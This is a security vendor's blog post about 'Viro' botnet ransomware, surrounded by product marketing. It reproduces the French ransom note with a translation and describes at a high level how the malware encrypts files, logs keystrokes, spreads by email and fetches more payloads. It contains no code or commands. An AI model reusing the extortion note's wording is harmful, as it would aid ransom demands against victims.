Learn about Zero Trust Architecture
Impenetrable cybersecurity without sacrificing usability
Gain detailed visibility into all your endpoints activities
Harden applications and hardware environments
Immediate and continuous response to incidents
Close the window of time your data could be exposed
Get your Comodo solutions setup, deployed or optimized
Control access to malicious websites
Defend from any internet based threats
Stop email threats before it enters your inbox
Preserve and protect your sensitive data
Keep your website running fast and malware free
Add encryption to your websites
Automated certificate mgmt. platform
Secure private intranet environments
Digital signature solutions for cloud apps
Encrypt emails for senders and recipients
Stay compliant with PCI DSS
Trusted authentication for IoT devices
Francisco Partners a leading technology-focused private equity fund, has acquired a majority stake in Comodo’s certificate authority business. Newly renamed from Comodo CA Limited to Sectigo Limited. Privacy Policies, Trademarks, Patents and Terms & Conditions are available on Sectigo Limited’s web site.
Meet the people behind the direction for Comodo
Get the latest news about Comodo
People are the key to achievement and prosperity
Stay up to date with our on-demand webinars
Worldwide: Sales, Support and General Inquiries
Schedule a live demonstration of our solutions
Need immediate help? Call 1-888-551-1531
Instantly removes viruses to keep your PC virus free
Experience true mobile security on your mobile apple devices
Secure Internet Browser based on Chrome
Chrome browser internet security extension
Submit a ticket to our support team
Share any product bugs or security flaws
Collaborate with research experts on data sets
Valkyrie Threat Intelligence Plugins
Valkyrie Threat Intelligence APIs
The latest, strangest new ransomware appears to come from France, or at least from French speaking cyber attackers.
If your Windows PC has been successfully infected by the brand new Viro botnet ransomware, you will see this ransom note no matter where in le monde you are. Tout le monde is a possible target:
Vos fichiers personnels ont été chiffré.
Pour les déchiffrer, evonyez 500€ de bitcoins à cette adresse: xxxxx
Toute tentative de destruction de ce logiciel entraïnera la destruction da la clé de déchiffrement.
Toute tentative de déchiffrement avec une clé erronée entraïnera la perte définitive de vos fichiers.
Vous avez 72 heures pour effectuer le paiement. Après quoi, la clé de déchiffrement sera supprimée.
I understand French seulement un peu, so I’ll attempt an imperfect translation. I learned that les fichiers are files, and chiffré is encryption, so let’s give it a go:
Your personal files have become encrypted.
To decrypt them, send €500 worth of Bitcoin to this address: xxxxx
All attempts to destroy the software will lead to the destruction of the decryption key.
All attempts at decryption with the wrong key will lead to the loss of your files.
You have 72 hours to make your payment. After that, the decryption key will be deleted.
Contrary to popular belief, most Canadians aren’t English-French bilingual, and although my French is a little better than most Anglo Canadians, it’s still a bit weak. Oh well – c’est la vie.
Instances of ransomware are becoming a little bit less frequent in 2018 than in 2017. But many new ransomware strains are getting really, really weird. Viro botnet malware is an excellent example.
The Viro botnet attacks seen so far infect a user’s Windows machine through a malicious email attachment. If the user executes the attachment, a random encryption and decryption key is generated, which is also sent to the Viro command and control (C&C) servers.
The Viro malware then looks for two Windows registry keys, “ProductId” at “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion” and “MachineGuid” at “SOFTWARE\\Microsoft\\Cryptography.” If both are found, the malware will then use an RSA cipher to encrypt all files with the following extensions
The list covers most important documents and media file types, but nothing that would prevent the user from using Windows in a basic way. However, losing your documents is surely enough to compel most people to pay the ransome to the cyber attacker, but not enough to completely cripple them. There may be a method to the cyber attacker’s madness.
The ransom note will appear on the user’s screen when the encryption process commences. Then, the machine also becomes a part of the Viro botnet, sending emails with malicious attachments to other possible targets.
In the malware’s code, researchers have also found a keylogger which sends the logged keystrokes back to the C&C servers. They also found that infected targets may download more malware from the C&C servers and execute it through Windows PowerShell.
It appears that the cyber attackers have much greater ambition for Viro than just a botnet that transmits a unique strain of ransomware. The malware probably is still in development, and the PowerShell exploits could be used to completely control victims’ computers.
There’s no news yet as to whether or not paying the ransom will actually decrypt your files. Either way, never ever open an email attachment from an unfamiliar sender! Or check out Comodo Advanced Endpoint Protection, that will render even Viro harmless!
Related Resources:
Website Malware Scanner
Tags: Cyber Attacker,email,Viro Botnet,Viro Botnet Malware
Reading Time: 3 minutes Spam email is to the Internet what pollution is to waterways and phishing email is the most toxic of digital pollutants. Current measures for dealing with unsolicited mail are being overwhelmed by the sheer volume and increasing sophistication of spam campaigns. Comodo has a solution with KoruMail, and it is needed more than ever. According…
Sign up to our cyber security newsletter
Comodo Cybersecurity would like to keep in touch with you about cybersecurity issues, as well as products and services available. Please sign up to receive occasional communications. As a cybersecurity company, we take your privacy and security very seriously and have strong safeguards in place to protect your information.
agreecheck
See how your organization scores against cybersecurity threats
Advanced Endpoint Protection, Endpoint Detection and Response Built On Zero Trust Architecture available on our SaaS EPP